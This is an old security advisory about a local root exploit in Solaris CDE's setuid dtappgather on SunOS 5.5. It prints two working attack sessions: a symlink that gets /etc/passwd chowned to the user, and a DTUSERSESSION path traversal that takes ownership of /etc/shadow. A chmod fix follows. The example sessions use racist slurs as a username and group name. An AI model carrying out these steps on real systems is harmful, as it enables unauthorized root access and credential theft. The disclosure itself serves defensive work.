COMMAND

    /usr/dt/bin/dtappgather

SYSTEMS AFFECTED

    SunOS 5.5 & 5.5.1 running CDE version 1.0.2

PROBLEM

    Mastoras found following.  Local users can change the ownership of
    any  file,  thus  gaining  root  priviledges. This happens because
    "dtappgather" does not check if the file:

	/var/dt/appconfig/appmanager/generic-display-0

    is a symbolic link and happily chown()s it to the user. When  CERT
    released advisory  CA-98.02 (see  CDE in  'mUNIXes' section) about
    /usr/dt/bin/dtappgather, Mastoras played a little with dtappgather
    and  discovered  the  problem  above,  but  he  thought that patch
    104498-02 corrects  it, as  described in  SUN's section  of 98.02.
    After  applying  the  patch,  it  was  still possible to gain root
    privs.   Following  exploit  was  initially  posted  to  hack.gr's
    security mailing list: "haxor".

    nigg0r@host% ls -l /etc/passwd
    -r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
    nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
    nigg0r@host% dtappgather
    MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
    nigg0r@host% ls -l /etc/passwd
    -r-xr-xr-x   1 nigg0r   niggers      1585 Dec 17 22:26 /etc/passwd
    nigg0r@host% echo "nigg0r wins! Fatality!" | mail root

    It  would  be  easy  to  find  the  exploit if you had read CERT's
    advisory.  The following steps were enough..

    % cp /usr/dt/bin/dtappgather .          [you can't "truss" suid proggies]
    % truss -o koko ./dtappgather
    % more koko
    [ shity ld things ]
    chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
    chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
    [ shitty things ]

    J.A. Gutierrez added  how the exploit  is much simpler  than that.
    Simply:

    $ id
    uid=6969(foo) gid=666(bar)
    $ ls -l /etc/shadow
    -r--------   1 root     sys          234 Nov  7  1999 /etc/shadow
    $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
    $ ls -l /etc/shadow
    -r-xr-xr-x   1 foo      bar          234 Nov  7  1999 /etc/shadow

    However,  first  exploit  works  (at  least, on solaris 2.5), even
    after patching CDE according to CERT advisory.

SOLUTION

    SunOS    5.6    (or    CDE     1.2)    comes    with     directory
    /var/dt/appconfig/appmanager/  mode  755  so  it's not possible to
    make the  necessary link.  On the  other hand,  in SunOS 5.5* this
    dir  has  mode  777,  so  you  can  easily  make  the link or even
    unlink/rename  the  file  "generic-display-0"  if  exists owned by
    another user.  Quick Fix:

        chmod -s /usr/dt/bin/dtappgather